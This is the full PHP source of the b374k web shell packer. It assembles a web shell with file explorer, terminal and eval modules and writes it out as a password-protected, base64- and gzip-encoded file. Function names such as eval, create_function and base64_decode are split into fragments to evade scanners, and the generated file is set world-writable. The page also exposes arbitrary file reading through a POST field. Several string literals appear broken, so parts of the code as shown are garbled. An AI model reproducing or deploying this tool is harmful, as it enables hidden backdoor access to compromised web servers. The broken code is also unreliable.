Be7ak shell

1. <?php
2. /*
3. b374k shell
4. Jayalah Indonesiaku
5. (c)2014
6. https://github.com/b374k/b374k
7. */
8. $GLOBALS['packer']['title'] = "b374k shell packer";
9. $GLOBALS['packer']['version'] = "0.4.2";
10. $GLOBALS['packer']['base_dir'] = "./base/";
11. $GLOBALS['packer']['module_dir'] = "./module/";
12. $GLOBALS['packer']['theme_dir'] = "./theme/";
13. $GLOBALS['packer']['module'] = packer_get_module();
14. $GLOBALS['packer']['theme'] = packer_get_theme();
15. require $GLOBALS['packer']['base_dir'].'jsPacker.php';
16. /* PHP FILES START */
17. $base_code = "";
18. $base_code .= packer_read_file($GLOBALS['packer']['base_dir']."resources.php");
19. $base_code .= packer_read_file($GLOBALS['packer']['base_dir']."main.php");
20. $module_code = packer_read_file($GLOBALS['packer']['base_dir']."base.php");
21. /* PHP FILES END */
22. /* JAVASCRIPT AND CSS FILES START */
23. $zepto_code = packer_read_file($GLOBALS['packer']['base_dir']."zepto.js");
24. $js_main_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."main.js");
25. $js_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."sortable.js").$js_main_code;
26. $js_code .= "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."base.js");
27. if(isset($_COOKIE['packer_theme'])) $theme = $_COOKIE['packer_theme'];
28. else $theme ="default";
29. $css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");
30. /* JAVASCRIPT AND CSS FILES END */
31. // layout
32. $layout = packer_read_file($GLOBALS['packer']['base_dir']."layout.php");
33. $p = array_map("rawurldecode", packer_get_post());
34. if(isset($_SERVER['REMOTE_ADDR'])){
35. if(isset($p['read_file'])){
36. $file = $p['read_file'];
37. if(is_file($file)){
38. packer_output(packer_html_safe(packer_read_file($file)));
39. }
40. packer_output('error');
41. }
42. elseif(isset($_GET['run'])){
43. if(empty($_GET['run'])) $modules = array();
44. else $modules = explode("," ,$_GET['run']);
45. $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
46. $module_arr = array_map("packer_wrap_with_quote", $module_arr);
47. $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
48. foreach($modules as $module){
49. $module = trim($module);
50. $filename = $GLOBALS['packer']['module_dir'].$module;
51. if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
52. if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
53. }
54. $layout = str_replace("<__CSS__>", $css_code, $layout);
55. $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
56. $layout = str_replace("<__JS__>", $js_code, $layout);
57. $content = trim($module_init)."?>".$base_code.$module_code.$layout;
58. eval($content);
59. die();
60. }
61. elseif(isset($p['outputfile'])&&isset($p['password'])&&isset($p['module'])&&isset($p['strip'])&&isset($p['base64'])&&isset($p['compress'])&&isset($p['compress_level'])){
62. $outputfile = trim($p['outputfile']);
63. if(empty($outputfile)) $outputfile = 'b374k.php';
64. $password = trim($p['password']);
65. $modules = trim($p['module']);
66. if(empty($modules)) $modules = array();
67. else $modules = explode("," ,$modules);
68. $strip = trim($p['strip']);
69. $base64 = trim($p['base64']);
70. $compress = trim($p['compress']);
71. $compress_level = (int) $p['compress_level'];
72. $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
73. $module_arr = array_map("packer_wrap_with_quote", $module_arr);
74. $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
75. foreach($modules as $module){
76. $module = trim($module);
77. $filename = $GLOBALS['packer']['module_dir'].$module;
78. if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
79. if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
80. }
81. $layout = str_replace("<__CSS__>", $css_code, $layout);
82. $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
83.  
84. if($strip=='yes') $js_code = packer_pack_js($js_code);
85. $layout = str_replace("<__JS__>", $js_code, $layout);
86. $htmlcode = trim($layout);
87. $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
88. packer_output(packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password));
89. }
90. else{
91.  
92. $available_themes = "<tr><td>Theme</td><td><select class='theme' style='width:150px;'>";
93. foreach($GLOBALS['packer']['theme'] as $k){
94. if($k==$theme) $available_themes .= "<option selected='selected'>".$k."</option>";
95. else $available_themes .= "<option>".$k."</option>";
96. }
97. $available_themes .= "</select></td></tr>";
98. ?><!doctype html>
99. <html>
100. <head>
101. <title><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></title>
102. <meta charset='utf-8'>
103. <meta name='robots' content='noindex, nofollow, noarchive'>
104. <style type="text/css">
105. <?php echo $css_code;?>
106. #devTitle{
107. font-size:18px;
108. text-align:center;
109. font-weight:bold;
110. }
111. </style>
112. </head>
113. <body>
114.  
115. <div id='wrapper' style='padding:12px'>
116. <div id='devTitle' class='border'><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></div>
117. <br>
118. <table class='boxtbl'>
119. <tr><th colspan='2'><p class='boxtitle'>Quick Run</p></th></tr>
120. <tr><td style='width:220px;'>Module (separated by comma)</td><td><input type='text' id='module' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
121. <?php echo $available_themes; ?>
122. <tr><td colspan='2'>
123. <form method='get' id='runForm' target='_blank'><input type='hidden' id='module_to_run' name='run' value='>
124. <span class='button' id='runGo'>Run</span>
125. </form>
126. </td></tr>
127. </table>
128. <br>
129. <table class='boxtbl'>
130. <tr><th colspan='2'><p class='boxtitle'>Pack</p></th></tr>
131. <tr><td style='width:220px;'>Output</td><td><input id='outputfile' type='text' value='b374k.php'></td></tr>
132. <tr><td>Password</td><td><input id='password' type='text' value='b374k'></td></tr>
133. <tr><td>Module (separated by comma)</td><td><input type='text' id='module_to_pack' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
134. <?php echo $available_themes; ?>
135. <tr><td>Strip Comments and Whitespaces</td><td>
136. <select id='strip' style='width:150px;'>
137. <option selected="selected">yes</option>
138. <option>no</option>
139. </select>
140. </td></tr>
141.  
142. <tr><td>Base64 Encode</td><td>
143. <select id='base64' style='width:150px;'>
144. <option selected="selected">yes</option>
145. <option>no</option>
146. </select>
147. </td></tr>
148.  
149. <tr id='compress_row'><td>Compress</td><td>
150. <select id='compress' style='width:150px;'>
151. <option>no</option>
152. <option selected="selected">gzdeflate</option>
153. <option>gzencode</option>
154. <option>gzcompress</option>
155. </select>
156. <select id='compress_level' style='width:150px;'>
157. <option>1</option>
158. <option>2</option>
159. <option>3</option>
160. <option>4</option>
161. <option>5</option>
162. <option>6</option>
163. <option>7</option>
164. <option>8</option>
165. <option selected="selected">9</option>
166. </select>
167. </td></tr>
168.  
169. <tr><td colspan='2'>
170. <span class='button' id='packGo'>Pack</span>
171. </td></tr>
172. <tr><td colspan='2' id='result'></td></tr>
173. <tr><td colspan='2'><textarea id='resultContent'></textarea></td></tr>
174. </table>
175. </div>
176.  
177. <script type='text/javascript'>
178. var init_shell = false;
179. <?php echo $zepto_code;?>
180. <?php echo $js_main_code;?>
181. var targeturl = '<?php echo packer_get_self(); ?>';
182. var debug = false;
183. Zepto(function($){
184. refresh_row();
185. $('#runGo').on('click', function(e){
186. module = $('#module').val();
187. $('#module_to_run').val(module);
188. $('#runForm').submit();
189. });
190. $('#base64').on('change', function(e){
191. refresh_row();
192. });
193. $('#packGo').on('click', function(e){
194. outputfile = $('#outputfile').val();
195. password = $('#password').val();
196. module = $('#module_to_pack').val();
197. strip = $('#strip').val();
198. base64 = $('#base64').val();
199. compress = $('#compress').val();
200. compress_level = $('#compress_level').val();
201. send_post({outputfile:outputfile, password:password, module:module, strip:strip, base64:base64, compress:compress, compress_level:compress_level}, function(res){
202. splits = res.split('{[|b374k|]}');
203. $('#resultContent').html(splits[1]);
204. $('#result').html(splits[0]);
205. });
206. });
207.  
208. $('.theme').on('change', function(e){
209. $('.theme').val($(this).val());
210. set_cookie('packer_theme', $('.theme').val());
211. location.href = targeturl;
212. });
213. });
214. function refresh_row(){
215. base64 = $('#base64').val();
216. if(base64=='yes'){
217. $('#compress_row').show();
218. }
219. else{
220. $('#compress_row').hide();
221. $('#compress').val('no');
222. }
223. }
224. </script>
225. </body>
226. </html><?php
227. }
228. }
229. else{
230. $output = $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version']."\n\n";
231. if(count($argv)<=1){
232. $output .= "options :\n";
233. $output .= "\t-o filename\t\t\t\tsave as filename\n";
234. $output .= "\t-p password\t\t\t\tprotect with password\n";
235. $output .= "\t-t theme\t\t\t\ttheme to use\n";
236. $output .= "\t-m modules\t\t\t\tmodules to pack separated by comma\n";
237. $output .= "\t-s\t\t\t\t\tstrip comments and whitespaces\n";
238. $output .= "\t-b\t\t\t\t\tencode with base64\n";
239. $output .= "\t-z [no|gzdeflate|gzencode|gzcompress]\tcompression (use only with -b)\n";
240. $output .= "\t-c [0-9]\t\t\t\tlevel of compression\n";
241. $output .= "\t-l\t\t\t\t\tlist available modules\n";
242. $output .= "\t-k\t\t\t\t\tlist available themes\n";
243. }
244. else{
245. $opt = getopt("o:p:t:m:sbz:c:lk");
246. if(isset($opt['l'])){
247. $output .= "available modules : ".implode(",", $GLOBALS['packer']['module'])."\n\n";
248. echo $output;
249. die();
250. }
251.  
252. if(isset($opt['k'])){
253. $output .= "available themes : ".implode(",", $GLOBALS['packer']['theme'])."\n\n";
254. echo $output;
255. die();
256. }
257. if(isset($opt['o'])&&(trim($opt['o'])!=')){
258. $outputfile = trim($opt['o']);
259. }
260. else{
261. $output .= "error : no filename given (use -o filename)\n\n";
262. echo $output;
263. die();
264. }
265. $password = isset($opt['p'])? trim($opt['p']):"";
266. $theme = isset($opt['t'])? trim($opt['t']):"default";
267. if(!in_array($theme, $GLOBALS['packer']['theme'])){
268. $output .= "error : unknown theme file\n\n";
269. echo $output;
270. die();
271. }
272. $css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");
273.  
274. $modules = isset($opt['m'])? trim($opt['m']):implode(",", $GLOBALS['packer']['module']);
275. if(empty($modules)) $modules = array();
276. else $modules = explode("," ,$modules);
277. $strip = isset($opt['s'])? "yes":"no";
278. $base64 = isset($opt['b'])? "yes":"no";
279. $compress = isset($opt['z'])? trim($opt['z']):"no";
280. if(($compress!='gzdeflate')&&($compress!='gzencode')&&($compress!='gzcompress')&&($compress!='no')){
281. $output .= "error : unknown options -z ".$compress."\n\n";
282. echo $output;
283. die();
284. }
285. else{
286. if(($base64=='no')&&($compress!='no')){
287. $output .= "error : use -z options only with -b\n\n";
288. echo $output;
289. die();
290. }
291. }
292. $compress_level = isset($opt['c'])? trim($opt['c']):"";
293. if(empty($compress_level)) $compress_level = '9';
294. if(!preg_match("/^[0-9]{1}$/", $compress_level)){
295. $output .= "error : unknown options -c ".$compress_level." (use only 0-9)\n\n";
296. echo $output;
297. die();
298. }
299. $compress_level = (int) $compress_level;
300. $output .= "Filename\t\t: ".$outputfile."\n";
301. $output .= "Password\t\t: ".$password."\n";
302. $output .= "Theme\t\t\t: ".$theme."\n";
303. $output .= "Modules\t\t\t: ".implode(",",$modules)."\n";
304. $output .= "Strip\t\t\t: ".$strip."\n";
305. $output .= "Base64\t\t\t: ".$base64."\n";
306. if($base64=='yes') $output .= "Compression\t\t: ".$compress."\n";
307. if($base64=='yes') $output .= "Compression level\t: ".$compress_level."\n";
308. $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
309. $module_arr = array_map("packer_wrap_with_quote", $module_arr);
310. $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
311. foreach($modules as $module){
312. $module = trim($module);
313. $filename = $GLOBALS['packer']['module_dir'].$module;
314. if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
315. if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
316. }
317. $layout = str_replace("<__CSS__>", $css_code, $layout);
318. $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
319.  
320. if($strip=='yes') $js_code = packer_pack_js($js_code);
321. $layout = str_replace("<__JS__>", $js_code, $layout);
322. $htmlcode = trim($layout);
323. $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
324. $res = packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password);
325. $status = explode("{[|b374k|]}", $res);
326. $output .= "Result\t\t\t: ".strip_tags($status[0])."\n\n";
327. }
328. echo $output;
329. }
330. function packer_read_file($file){
331. $content = false;
332. if($fh = @fopen($file, "rb")){
333. $content = "";
334. while(!feof($fh)){
335. $content .= fread($fh, 8192);
336. }
337. }
338. return $content;
339. }
340. function packer_write_file($file, $content){
341. if($fh = @fopen($file, "wb")){
342. if(fwrite($fh, $content)!==false){
343. if(!class_exists("ZipArchive")) return true;
344.  
345. if(file_exists($file.".zip")) unlink ($file.".zip");
346. $zip = new ZipArchive();
347. $filename = "./".$file.".zip";
348. if($zip->open($filename, ZipArchive::CREATE)!==TRUE) return false;
349. $zip->addFile($file);
350. $zip->close();
351. return true;
352. }
353. }
354. return false;
355. }
356. function packer_get_post(){
357. return packer_fix_magic_quote($_POST);
358. }
359. function packer_fix_magic_quote($arr){
360. $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
361. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
362. if(is_array($arr)){
363. foreach($arr as $k=>$v){
364. if(is_array($v)) $arr[$k] = clean($v);
365. else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
366. }
367. }
368. }
369. return $arr;
370. }
371. function packer_html_safe($str){
372. return htmlspecialchars($str, 2 | 1);
373. }
374. function packer_wrap_with_quote($str){
375. return "\"".$str."\"";
376. }
377. function packer_output($str){
378. header("Content-Type: text/plain");
379. header("Cache-Control: no-cache");
380. header("Pragma: no-cache");
381. echo $str;
382. die();
383. }
384. function packer_get_self(){
385. $query = (isset($_SERVER["QUERY_STRING"])&&(!empty($_SERVER["QUERY_STRING"])))?"?".$_SERVER["QUERY_STRING"]:"";
386. return packer_html_safe($_SERVER["REQUEST_URI"].$query);
387. }
388. function packer_strips($str){
389. $newStr = ';
390. $commentTokens = array(T_COMMENT);
391. if(defined('T_DOC_COMMENT')) $commentTokens[] = T_DOC_COMMENT;
392. if(defined('T_ML_COMMENT')) $commentTokens[] = T_ML_COMMENT;
393. $tokens = token_get_all($str);
394. foreach($tokens as $token){
395. if (is_array($token)) {
396. if (in_array($token[0], $commentTokens)) continue;
397. $token = $token[1];
398. }
399. $newStr .= $token;
400. }
401. $newStr = preg_replace("/(\s{2,})/", " ", $newStr);
402. return $newStr;
403. }
404. function packer_get_theme(){
405. $available_themes = array();
406. foreach(glob($GLOBALS['packer']['theme_dir']."*.css") as $filename){
407. $filename = basename($filename, ".css");
408. $available_themes[] = $filename;
409. }
410. return $available_themes;
411. }
412. function packer_get_module(){
413. $available_modules = array();
414. foreach(glob($GLOBALS['packer']['module_dir']."*.php") as $filename){
415. $filename = basename($filename, ".php");
416. if(packer_check_module($filename)) $available_modules[] = $filename;
417. }
418. return $available_modules;
419. }
420. function packer_check_module($module){
421. $filename = $GLOBALS['packer']['module_dir'].$module;
422. if(is_file($filename.".php")){
423. $content = packer_read_file($filename.".php");
424. @eval("?>".$content);
425. if($GLOBALS['module'][$module]['id']==$module) return true;
426. }
427. return false;
428. }
429. function packer_pack_js($str){
430. $packer = new JavaScriptPacker($str, 0, true, false);
431. return $packer->pack();
432. }
433. function packer_b374k($output, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password){
434. $content = "";
435. if(is_file($output)){
436. if(!is_writable($output)) return "error : file ".$output." exists and is not writable{[|b374k|]}";
437. }
438. if(!empty($password)) $password = "\$GLOBALS['pass'] = \"".sha1(md5($password))."\"; // sha1(md5(pass))\n";
439. $compress_level = (int) $compress_level;
440. if($compress_level<0) $compress_level = 0;
441. elseif($compress_level>9) $compress_level = 9;
442. $version = "";
443. if(preg_match("/\\\$GLOBALS\['ver'\]\ *=\ *[\"']+([^\"']+)[\"']+/", $phpcode, $r)){
444. $version = $r[1];
445. }
446.  
447. $header = "<?php
448. /*
449. b374k shell ".$version."
450. Jayalah Indonesiaku
451. (c)".@date("Y",time())."
452. https://github.com/b374k/b374k
453. */\n";
454. if($strip=='yes'){
455. $phpcode = packer_strips($phpcode);
456. $htmlcode = preg_replace("/(\ {2,}|\n{2,}|\t+)/", "", $htmlcode);
457. $htmlcode = preg_replace("/\r/", "", $htmlcode);
458. $htmlcode = preg_replace("/}\n+/", "}", $htmlcode);
459. $htmlcode = preg_replace("/\n+}/", "}", $htmlcode);
460. $htmlcode = preg_replace("/\n+{/", "{", $htmlcode);
461. $htmlcode = preg_replace("/\n+/", "\n", $htmlcode);
462. }
463. $content = $phpcode.$htmlcode;
464. if($compress=='gzdeflate'){
465. $content = gzdeflate($content, $compress_level);
466. $encoder_func = "gz'.'in'.'fla'.'te";
467. }
468. elseif($compress=='gzencode'){
469. $content = gzencode($content, $compress_level);
470. $encoder_func = "gz'.'de'.'co'.'de";
471. }
472. elseif($compress=='gzcompress'){
473. $content = gzcompress($content, $compress_level);
474. $encoder_func = "gz'.'un'.'com'.'pre'.'ss";
475. }
476. else{
477. $encoder_func = "";
478. }
479. if($base64=='yes'){
480. $content = base64_encode($content);
481. if($compress!='no'){
482. $encoder = $encoder_func."(ba'.'se'.'64'.'_de'.'co'.'de(\$x))";
483. }
484. else{
485. $encoder = "ba'.'se'.'64'.'_de'.'co'.'de(\"\$x\")";
486. }
487. $code = $header.$password."\$func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on\";\$b374k=\$func('\$x','ev'.'al'.'(\"?>\".".$encoder.");');\$b374k(\"".$content."\");?>";
488. }
489. else{
490. if($compress!='no'){
491. $encoder = $encoder_func."(\$x)";
492. }
493. else{
494. $code = $header.$password."?>".$content;
495. $code = preg_replace("/\?>\s*<\?php\s*/", "", $code);
496. }
497. }
498. if(is_file($output)) unlink($output);
499. if(packer_write_file($output, $code)){
500. chmod($output, 0777);
501. return "Succeeded : <a href='".$output."' target='_blank'>[ ".$output." ] Filesize : ".filesize($output)."</a>{[|b374k|]}".packer_html_safe(trim($code));
502. }
503. return "error{[|b374k|]}";
504. }
505. ?>